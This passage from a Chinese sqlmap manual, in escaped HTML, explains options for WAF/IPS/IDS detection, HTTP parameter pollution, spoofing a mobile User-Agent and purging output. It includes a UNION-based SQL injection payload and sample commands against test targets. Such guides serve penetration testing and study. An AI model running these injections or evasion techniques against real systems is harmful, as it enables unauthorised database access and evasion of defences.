style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;beep<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53d1\u73b0<span>sql<\/span><span>\u6ce8\u5165\u65f6\uff0c\u53d1\u51fa\u8702\u9e23\u58f0\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%90%AF%E5%8F%91%E5%BC%8F%E6%A3%80%E6%B5%8BWAFIPSIDS%E4%BF%9D%E6%8A%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u542f\u53d1\u5f0f\u68c0\u6d4bWAF\/IPS\/IDS\u4fdd\u62a4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;check-waf<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">WAF\/IPS\/IDS<span>\u4fdd\u62a4\u53ef\u80fd\u4f1a\u5bf9<\/span><span>sqlmap<\/span><span>\u9020\u6210\u5f88\u5927\u7684\u56f0\u6270\uff0c\u5982\u679c\u6000\u7591\u76ee\u6807\u6709\u6b64\u9632\u62a4\u7684\u8bdd\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u6765\u6d4b\u8bd5\u3002&nbsp;<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u4f7f\u7528\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u53c2\u6570\u6765\u6ce8\u5165\u6d4b\u8bd5<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">&amp;foobar=AND&nbsp;1=1&nbsp;UNION&nbsp;ALL&nbsp;SELECT&nbsp;1,2,3,table_name&nbsp;FROM&nbsp;information_schema.tables&nbsp;WHERE&nbsp;2&gt;1<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u6709\u4fdd\u62a4\u7684\u8bdd\u53ef\u80fd\u8fd4\u56de\u7ed3\u679c\u4f1a\u4e0d\u540c\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B8%85%E7%90%86sqlmap%E7%9A%84UDFs%E5%92%8C%E8%A1%A8\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6e05\u7406sqlmap\u7684UDF(s)\u548c\u8868<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;cleanup<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6e05\u9664<span>sqlmap<\/span><span>\u6ce8\u5165\u65f6\u4ea7\u751f\u7684<\/span><span>udf<\/span><span>\u4e0e\u8868\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%A6%81%E7%94%A8%E5%BD%A9%E8%89%B2%E8%BE%93%E5%87%BA\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u7981\u7528\u5f69\u8272\u8f93\u51fa<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53c2\u6570\uff1a<span>&#8211;disable-coloring<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9ed8\u8ba4\u5f69\u8272\u8f93\u51fa\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u7981\u6389\u5f69\u8272\u8f93\u51fa\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8%E6%8C%87%E5%AE%9A%E7%9A%84Google%E7%BB%93%E6%9E%9C%E9%A1%B5%E9%9D%A2\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528\u6307\u5b9a\u7684Google\u7ed3\u679c\u9875\u9762<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;gpage<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4<span>sqlmap<\/span><span>\u4f7f\u7528\u524d<\/span><span>100<\/span><span>\u4e2a<\/span><span>URL<\/span><span>\u5730\u5740\u4f5c\u4e3a\u6ce8\u5165\u6d4b\u8bd5\uff0c\u7ed3\u5408\u6b64\u9009\u9879\uff0c\u53ef\u4ee5\u6307\u5b9a\u9875\u9762\u7684<\/span><span>URL<\/span><span>\u6d4b\u8bd5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BD%BF%E7%94%A8HTTP%E5%8F%82%E6%95%B0%E6%B1%A1%E6%9F%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4f7f\u7528HTTP\u53c2\u6570\u6c61\u67d3<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span 
class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--hpp<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">HTTP<span>\u53c2\u6570\u6c61\u67d3\u53ef\u80fd\u4f1a\u7ed5\u8fc7<\/span><span>WAF\/IPS\/IDS<\/span><span>\u4fdd\u62a4\u673a\u5236\uff0c\u8fd9\u4e2a\u5bf9<\/span><span>ASP\/IIS<\/span><span>\u4e0e<\/span><span>ASP.NET\/IIS<\/span><span>\u5e73\u53f0\u5f88\u6709\u6548\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B5%8B%E8%AF%95WAFIPSIDS%E4%BF%9D%E6%8A%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6d4b\u8bd5WAF\/IPS\/IDS\u4fdd\u62a4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--identify-waf<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u5c1d\u8bd5\u627e\u51fa<\/span><span>WAF\/IPS\/IDS<\/span><span>\u4fdd\u62a4\uff0c\u65b9\u4fbf\u7528\u6237\u505a\u51fa\u7ed5\u8fc7\u65b9\u5f0f\u3002\u76ee\u524d\u5927\u7ea6\u652f\u6301<\/span><span>30<\/span><span>\u79cd\u4ea7\u54c1\u7684\u8bc6\u522b\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New
Roman';\">\u4f8b\u5982\u5bf9\u4e00\u4e2a\u53d7\u5230<span>ModSecurity&nbsp;WAF<\/span><span>\u4fdd\u62a4\u7684<\/span><span>MySQL<\/span><span>\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.21.128\/sqlmap\/mysql\/get_int.php?id=1&#8221;&nbsp;&#8211;identify-waf&nbsp;-v&nbsp;3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[INFO]&nbsp;testing&nbsp;connection&nbsp;to&nbsp;the&nbsp;target&nbsp;URL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[INFO]&nbsp;heuristics&nbsp;detected&nbsp;web&nbsp;page&nbsp;charset&nbsp;&#8216;ascii&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[INFO]&nbsp;using&nbsp;WAF&nbsp;scripts&nbsp;to&nbsp;detect&nbsp;backend&nbsp;WAF\/IPS\/IDS&nbsp;protection<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;USP&nbsp;Secure&nbsp;Entry&nbsp;Server&nbsp;(United&nbsp;Security&nbsp;Providers)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;BinarySEC&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(BinarySEC)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;NetContinuum&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(NetContinuum\/Barracuda&nbsp;Networks)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Hyperguard&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(art&nbsp;of&nbsp;defence&nbsp;Inc.)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Cisco&nbsp;ACE&nbsp;XML&nbsp;Gateway&nbsp;(Cisco&nbsp;Systems)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;TrafficShield&nbsp;(F5&nbsp;Networks)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Teros\/Citrix&nbsp;Application&nbsp;Firewall&nbsp;Enterprise&nbsp;(Teros\/Citrix&nbsp;Systems)&#8217;<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;KONA&nbsp;Security&nbsp;Solutions&nbsp;(Akamai&nbsp;Technologies)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Incapsula&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Incapsula\/Imperva)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;CloudFlare&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(CloudFlare)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Barracuda&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Barracuda&nbsp;Networks)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;webApp.secure&nbsp;(webScurity)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Proventia&nbsp;Web&nbsp;Application&nbsp;Security&nbsp;(IBM)&#8217;<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;declared&nbsp;web&nbsp;page&nbsp;charset&nbsp;&#8216;iso-8859-1&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;page&nbsp;not&nbsp;found&nbsp;(404)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;KS-WAF&nbsp;(Knownsec)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;NetScaler&nbsp;(Citrix&nbsp;Systems)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;Jiasule&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Jiasule)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;WebKnight&nbsp;Application&nbsp;Firewall&nbsp;(AQTRONIX)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;AppWall&nbsp;(Radware)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[DEBUG]&nbsp;checking&nbsp;for&nbsp;WAF\/IDS\/IPS&nbsp;product&nbsp;&#8216;ModSecurity:&nbsp;Open&nbsp;Source&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Trustwave)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:23]&nbsp;[CRITICAL]&nbsp;WAF\/IDS\/IPS&nbsp;identified&nbsp;&#8216;ModSecurity:&nbsp;Open&nbsp;Source&nbsp;Web&nbsp;Application&nbsp;Firewall&nbsp;(Trustwave)&#8217;.&nbsp;Please&nbsp;consider&nbsp;usage&nbsp;of&nbsp;tamper&nbsp;scripts&nbsp;(option&nbsp;&#8216;&#8211;tamper&#8217;)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%A8%A1%E4%BB%BF%E6%99%BA%E8%83%BD%E6%89%8B%E6%9C%BA\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6a21\u4eff\u667a\u80fd\u624b\u673a<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;mobile<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u6709\u65f6\u670d\u52a1\u7aef\u53ea\u63a5\u6536\u79fb\u52a8\u7aef\u7684\u8bbf\u95ee\uff0c\u6b64\u65f6\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2a\u624b\u673a\u7684<span>User-Agent<\/span><span>\u6765\u6a21\u4eff\u624b\u673a\u767b\u5f55\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;\"http:\/\/www.target.com\/vuln.php?id=1\"&nbsp;--mobile<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">which&nbsp;smartphone&nbsp;do&nbsp;you&nbsp;want&nbsp;sqlmap&nbsp;to&nbsp;imitate&nbsp;through&nbsp;HTTP&nbsp;User-Agent&nbsp;header?<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1]&nbsp;Apple&nbsp;iPhone&nbsp;4s&nbsp;(default)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[2]&nbsp;BlackBerry&nbsp;9900<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[3]&nbsp;Google&nbsp;Nexus&nbsp;7<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\"
style=\"font-size:10.0000pt;font-family:'Courier New';\">[4]&nbsp;HP&nbsp;iPAQ&nbsp;6365<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[5]&nbsp;HTC&nbsp;Sensation<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[6]&nbsp;Nokia&nbsp;N97<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[7]&nbsp;Samsung&nbsp;Galaxy&nbsp;S<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&gt;&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%AE%89%E5%85%A8%E7%9A%84%E5%88%A0%E9%99%A4output%E7%9B%AE%E5%BD%95%E7%9A%84%E6%96%87%E4%BB%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;purge-output<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u6709\u65f6\u9700\u8981\u5220\u9664\u7ed3\u679c\u6587\u4ef6\uff0c\u800c\u4e0d\u88ab\u6062\u590d\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u539f\u6709\u6587\u4ef6\u5c06\u4f1a\u88ab\u968f\u673a\u6570\u636e\u8986\u76d6\u3002\u6ce8\u610f\uff1a\u5728SSD\u6216\u65e5\u5fd7\u578b\u6587\u4ef6\u7cfb\u7edf\u4e0a\uff0c\u8986\u76d6\u5199\u5165\u5e76\u4e0d\u80fd\u4fdd\u8bc1\u6570\u636e\u65e0\u6cd5\u6062\u590d\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;--purge-output&nbsp;-v&nbsp;3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[INFO]&nbsp;purging&nbsp;content&nbsp;of&nbsp;directory&nbsp;&#8216;\/home\/user\/sqlmap\/output&#8217;&#8230;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;changing&nbsp;file&nbsp;attributes<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;writing&nbsp;random&nbsp;data&nbsp;to&nbsp;files<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;truncating&nbsp;files<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\"
style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;renaming&nbsp;filenames&nbsp;to&nbsp;random&nbsp;values<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;renaming&nbsp;directory&nbsp;names&nbsp;to&nbsp;random&nbsp;values<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:55]&nbsp;[DEBUG]&nbsp;deleting&nbsp;the&nbsp;whole&nbsp;directory&nbsp;tree<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%90%AF%E5%8F%91%E5%BC%8F%E5%88%A4%E6%96%AD%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u542f\u53d1\u5f0f\u5224\u65ad\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span 